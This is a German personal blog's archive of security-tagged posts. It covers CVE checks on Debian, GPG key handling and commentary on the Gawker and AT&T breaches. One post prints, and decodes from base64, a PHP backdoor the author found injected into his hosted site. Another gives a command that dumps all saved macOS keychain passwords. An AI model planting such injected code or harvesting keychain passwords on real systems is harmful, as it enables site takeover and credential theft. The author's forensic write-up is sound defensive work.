Posts Tagged ‘Sicherheit’

Donnerstag, 5. März 2015

Ist ein bestimmtes Debian-Paket von einer Sicherheitslücke betroffen?

In den letzten Tagen kam es knüppelhart: Zuerst meldeten die PHP-Entwickler eine Sicherheitslücke in der unserialize()-Funktion (CVE-2015-0273), tags darauf mussten die Leute hinter Samba ein schwerwiegendes Problem in ihrer Software anerkennen (CVE-2015-0240).

Wie gehe ich sicher, dass auf meinem Debian-Server zu Hause Pakete installiert sind, in welchen diese Sicherheitsprobleme bereits behoben wurden?Nach einer kurzen Google-Suche fand ich die Antwort:

Im Debian Security Tracker kann ich nachschauen, welche Pakete von welchen „Common Vulnerabilities and Exposure“ betroffen sind. In den beiden erwähnten Fällen lauten die URLs auf die Detailseite folgendermassen:

Die dort angegebenen Versionsnummern kann ich anschliessend auf meinem Server mittels folgendem Befehl überprüfen:

$ dpkg --list | grep php
...
ii  php5                                 5.6.5+dfsg-2                         all          server-side, HTML-embedded scripting language (metapackage)
...

5.6.5+dfsg-2 ist immer noch anfällig auf das Problem, da die Sicherheitslücke offenbar erst mit 5.6.6+dfsg-2 behoben ist. Nebenbei: Mehr zum Kürzel „dfsg“.

Deshalb führe ich folgenden Befehl aus:

# apt-get upgrade php5
...
Calculating upgrade... php5 is already the newest version.
...

Offenbar muss ich mich also noch ein wenig in Geduld üben.

Bei Samba schaut es folgendermassen aus:

$ dpkg --list | grep samba
...
ii  samba                                2:4.1.17+dfsg-1                      i386         SMB/CIFS file, print, and login server for Unix
...

4.1.17+dfsg-1 wird auf der Web-Site als „fixed“ geführt. Glück gehabt!

Tags: , , , ,
Labels: IT

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 14. Dezember 2014

Welche Adobe Flash-Version verwende ich?

In den letzten Wochen haben sich die Sicherheits-Updates für Adobes Flash-Frickelware wieder gehäuft. Ob ich das neuste Plugin auf einem Rechner installieren muss, sagt mir folgende Web-Site:

What is my Flash Player version? Is it up-to-date?

Die Web-Site Flash Tester liefert zusätzlich eine Chronologie aller Updates und verlinkt zudem auf eine offizielle, von Adobe gehostete Seite, welche die Version des aktuell installierten Flash-Plugins anzeigt, an Hand derer der Benutzer in einer Tabelle selber nachschauen muss, ob er schon Up-to-date ist:

Adobe — Flash Player Version Information

Meine Besucher entscheiden bitte selber, welche der beiden Web-Seiten nun benutzerfreundlicher ist … ich persönlich habe meine Meinung gebildet, und sie bekräftigt meinen Eindruck des Bloatware-Herstellers Adobe.

Tags: , , , , ,
Labels: Web

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 16. September 2012

Apple Keychain-Passwörter auf der Kommandozeile ausgeben

Mit folgendem Kommandozeilen-Befehl gibt man alle in der Apple Keychain gespeicherten Passwörter für den aktuellen Benutzer aus:

security dump-keychain -d ~/Library/Keychains/login.keychain

ACHTUNG: Wer (vorbildlicherweise) die Keychain für fremde Zugriffe gesperrt hat, muss für jeden Eintrag ein Dialogfeld abnicken, um den Zugriff für die Anwendung security zu gewähren.

Via: Print out all your saved passwords – OSX

Tags: , , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Autos auch am Tag mit Licht

Mousseman ist und bleibt der Hardliner in der schweizerischen Blogger-Szene:

Gerade das Lichtobligatorium für PKW am hellichten Tag halte ich für einen patenten Schwachsinn. Wer ein Auto am Tag nicht sieht, ist blind.

Quelle: Neues Parlament, neues ‚Via Sicura‘, gleicher Stuss

Tags: , ,
Labels: Schweiz

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Genotec-Web-Server gehackt

Bei einer Routineüberprüfung meiner bei der Genotec AG gehosteten Web-Site eMeidi.com entdeckte ich soeben in der index.php in meinem Web-Root zuoberst folgenden kryptischen Eintrag:

<?php
error_reporting(0);
$gc0=base64_decode('ZG93bmxvYWRzL3dpbmRvd3MtcHJpY2VzLw==');
$fq1=$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];
$ti2=strpos($fq1,base64_decode('cD0='));

if($ti2===0){include($gc0.base64_decode('Pw==').$fq1);
exit;
}?>
<?php include(base64_decode('c2l0ZWluZGV4LnBocA=='));?>
...

Nach einer kurzen Analse der Base64-enkodierten Strings ging mir ein Lichtlein auf:

<?php
error_reporting(0);
$gc0='downloads/windows-prices/';
$fq1=$_SERVER['QUERY_STRING'];
$ti2=strpos($fq1,'p=');

if($ti2===0){include($gc0.'?'.$fq1);
exit;
}?>
<?php include('siteindex.php');?>
...

Dies erklärt mir endlich, wieso bei der Google-Suche nach eMeidi seit Monaten folgende komische Beschreibung zu meiner Web-Site angezeigt wird:

Im Web-Root fanden sich folgende drei vom Hacker hinterlegte Dateien (ls -l unter Mac OS X, das Datum und die Dateigrössen stimmen mit dem Web-Server überein):

-rw-r--r--@ 1 mario  staff  23233  5 Jul  2010 login.php
-rw-r--r--@ 1 mario  staff  14028  5 Jul  2010 siteindex.php
-rw-r--r--@ 1 mario  staff  17986  5 Jul  2010 sitestatus.php

Zweck

(Vermutung) Das einschleusen von Seiteninhalten, um das Google-Ranking meiner Web-Site auszunutzen und unbedarfte Anwender auf Web-Sites zu locken, auf welchen Waren (wohl vornehmlich Raubkopien) angeboten werden — oder Kreditkartendaten abgegriffen werden.

/downloads/windows-prices/

Im besagten Verzeichnis /downloads/windows-prices/finden sich in ca. 10’000 Dateien über 190MB an Daten. Leider kann ich diese nicht löschen, weil sie dem www-Benutzer und nicht dem www4607 gehören. Ich gehe deshalb davon aus, dass nicht ein fehlerhaftes Script von mir für die Sicherheitslücke verantwortlich ist, sondern eine Sicherheitslücke in Apache:

Verzeichnis-Listing

Forensik

Wer mehr über die Technik hinter dem Hack erfahren will, lädt sich das mehr als 70MB umfassende Archiv aller suspekten Dateien herunter, welche ich vor der definitiven Löschung von meinem Server gesichert habe:

Archiv aller vom Hacker auf meinem Server abgelegten Dateien

Tags: , ,
Labels: Allgemein

5 Kommentare | neuen Kommentar verfassen

Montag, 6. Juni 2011

Rätselraten über die Ursache hinter den EHEC-Infektionen

Ich liebe Politiker (nicht zuletzt, weil ich selber auch einer bin): Da gibt es eine Infektion, von welcher man nicht genau weiss, wodurch sie übertragen wird. Deshalb tritt man vor die Medien, feuert aus dem Bauch heraus gegen spanische Gurken und verursacht so bei den Landwirtskollegen auf der iberischen Halbinsel einen massiven Verlust:

The Spanish government did not comment Sunday on the latest news in the German investigation. But mounting evidence that the problem should never have been linked to produce from Spanish farms is likely to raise pressure on Germany and the European Union to compensate Spanish farmers for estimated weekly losses of $286 million in revenue because of canceled shipments, as well as massive job cuts among seasonal growers in Andalusia.

Quelle: Deadly E. Coli Outbreak Linked to Sprouts From a German Farm – NYTimes.com

Mittlerweile hat man sich von dieser doch etwas abstrusen Theorie abgekehrt, hat voreilig Kartoffelkeller als EHEC-Herde gebrandmarkt, um schlussendlich zu merken, dass es doch vielleicht einfach Sprossen sind, die die Krankheit übertragen.

Vielleicht würde es den deutschen Politikern gut tun, einfach mal die Klappe zu halten und schlüssige Resultate der Wissenschaftler abzuwarten. Und die Journalisten sollten sich ebenfalls etwas gedulden und nicht wie ein Fasnachts-Gugge morgens um 3 Uhr in jeden noch geöffneten Keller in der Berner Altstadt einfallen.

Die Volksvertreter im hohen Norden sollten sich ein Beispiel an Apple nehmen. Kürzlich hat Apple an Hand von zwei Beispielen gezeigt, wie man mit Krisen umgeht:

  • Lodsys betätigt sich ab dem 13. Mai 2011 als Patent-Troll. Die Stellungnahme von Apple erfolgt 10 Tage später, am 23. Mai 2011. Sie lässt keine Fragen offen.
  • Die Malware MACDefender wird ab dem 2. Mai 2011 zunehmend von unbedarften Apple-Benutzern auf Systemen installiert. Apple reagiert 29 Tage später, am 31. Mai 2011, mit einem Security Update, welches die aktuelle Version der Software und mögliche zukünftige Varianten des Schädlings blockieren.

Das Rezept ist bei dieser professionell agierenden Bude immer dasselbe: Abwarten, analysieren und erst dann vor das Publikum treten, wenn mit einer bombensicher funktionierenden (!) Lösung des Problems aufgewartet werden kann. Gruber hat dieses vorbildliche Verhalten wie immer in einem Artikel zusammengefasst.

Und wer mir jetzt widerspricht, dass ich hier Apple mit Birnen vergleiche: Die deutschen Politiker hätten ihren Mitbürgern vielleicht raten sollen, in den nächsten zwei Wochen einfach mal nichts zu essen … Man weiss ja nie!

Tags: , , , , , , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Samstag, 4. Juni 2011

Manuell ein TimeMachine sparsebundle-Image anlegen

Für meinen betagten PowerMac G5 sah der Befehl folgendermassen aus:

$ hdiutil create -size 500g -fs HFS+J -volname "BETA" beta_000a95XXXXXX.sparsebundle

… wobei ich aus Datenschutzgründen die MAC-Adresse mittels „X“-Zeichen unkenntlich gemacht habe.

Das damit erstellte Image kann man anschliessend auf einer Samba-Freigabe auf einem Server ablegen und als TimeMachine-Ziel benutzen. Bei mir klappte diese Art von Backup einige Monate, bis das Image irgendwie korrumpiert wurde. Seither fahre ich kein TimeMachine-Backup mehr.

Vielleicht bringt ja die WWDC-Keynote 2011 eine interessante neue Möglichkeit (iCloud?), um Backups zu fahren.

Tags: , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 25. Mai 2011

Mein neuer PGP-Schlüssel

… lautet neu 2D1F94A8.

Als ich im Sommer 2007 meine Teilzeitanstellung bei der Liip AG antrat, war eine der ersten Aufgaben, einen PGP-Schlüssel zu erstellen.

Ich habe damals den Anfängerfehler begannen, für jede meiner E-Mail-Adressen ein neues Private/Public-Schlüsselpaar zu erstellen. Dieses Problem habe ich heute nun endlich behoben und alle meine E-Mail-Adressen mit einem einzigen universalen Schlüssel ausgestattet und die alten deaktiviert.

Bestehende Schlüssel löschen

Einmal in den Umlauf gebrachte öffentliche PGP-Schlüssel lassen sich nicht mehr löschen. Stattdessen muss der Besitzer diese mittels „revoke“ unbrauchbar machen.

Hierzu war es von Vorteil, dass ich im 2007 bereits bei der Erstellung der Schlüssel mittels gpg --gen-revoke 4A7347BE entschlessende Revoke-Zertifikate erstellt hatte. Diese konnte ich nun endlich einsetzen:

$ gpg --import revocation-4A7347BE.txt
$ gpg --send-keys 4A7347BE

Neue Schlüssel erstellen

Dies geschieht mit grosser Hilfe des GnuPG-Tools ganz einfach mit folgendem Befehl:

$ gpg --gen-key

Als nächstes erstellt man das Revoke-Zertifikat:

$ gpg --gen-revoke 2D1F94A8

Und nun endlich fügt man dem neuen Schlüssel weitere E-Mail-Adressen hinzu:

$ gpg --edit-key 2D1F94A8
> adduid

Sobald man alle E-Mail-Adressen erfasst hat, schickt man den öffentlichen Schlüssel an einen PGP-Keyserver:

gpg --send-keys 2D1F94A8

Um zu überprüfen, dass der Schlüssel beim Server angekommen ist und von anderen Benutzern gefunden werden kann, kann man diesen mittels einer Web-Oberflache abfragen:

pgp.mit.edu

Sonstige nützliche Befehle

Schlüssel vom Server abrufen und lokal speichern:

$ gpg --recv-keys DDB43876

Schlüssel für eine von mehreren E-Mailadresse ungültig machen:

$ gpg --edit-key 2D1F94A8
> uid 2
> revuid
$ gpg --send-keys 2D1F94A8

GUI-Tools für Mac OS X

Mittlerweile existiert für Mac OS X 10.6 ein Software-Paket, dass das Betriebsystem mit allen nötigen (GUI-)Tools ausstattet, die man so benötigt:

GPGTools

Da ich auf einem Rechner noch Mac OS X 10.5 einsetze, musste ich für das dort installierte Apple Mail eine ältere Version des MailBundle installieren.

Tags: , , ,
Labels: Linux

Keine Kommentare | neuen Kommentar verfassen

Donnerstag, 23. Dezember 2010

Automatische Überwachung von Servern mit sensitiven Informationen? Fehlanzeige.

After gaining access to gawkers MySQL database we stumble upon a huge
table containing ~1,500,000 users. After a few days of dumping we
decided that 1.3 million was enough.

Quelle: Hacker News | From the readme: After gaining access to gawkers MySQL database we stumble upo…

Ist ja nicht so, als gäbe es solche Hacks erst seit November 2010 … Wieso zum Teufel setzt jemand, der 1.5 Millionen Benutzerdaten in seiner MySQL-Datenbank rumliegen hat, keine Software ein, die Alarm schlägt, wenn tagelang Daten „abgesaugt“ werden? Eine Schande für die gesamte Web-Entwickler-Zunft.

Tags: , , ,
Labels: IT, Web

Keine Kommentare | neuen Kommentar verfassen

Dienstag, 15. Juni 2010

Der AT&T-Hack — Einfacher geht’s nicht!

Members of the group used the UCC-ID that is on each iPad 3G and pinged the AT&T login page with it. That page returned an e-mail address associated with that iPad 3G. They then wrote a simple script to ping the page with a series of numbers repeatedly until they had 114,000 e-mail addresses.

Quelle: AT&T Explains iPad Security Breach – Bits Blog – NYTimes.com

Fast so gut wie eine Suchfunktion für Benutzer einer Web-Community, mit welcher man nach einer kurzen Hackerei auch nach deren Passwörter suchen kann …

Selbst wenn wir davon ausgehen, dass Programmierfehler (hier eher: Überlegungsfehler) immer wieder geschehen werden: Wieso betreibt AT&T kein Security-Monitoring ihrer Web-Server, welches Alarm schlägt, wenn eine bestimmte Web-Seite von einer bestimmten IP innert Sekunden tausende Male aufgerufen wird?

Tags: , , , ,
Labels: Apple, IT, USA

Keine Kommentare | neuen Kommentar verfassen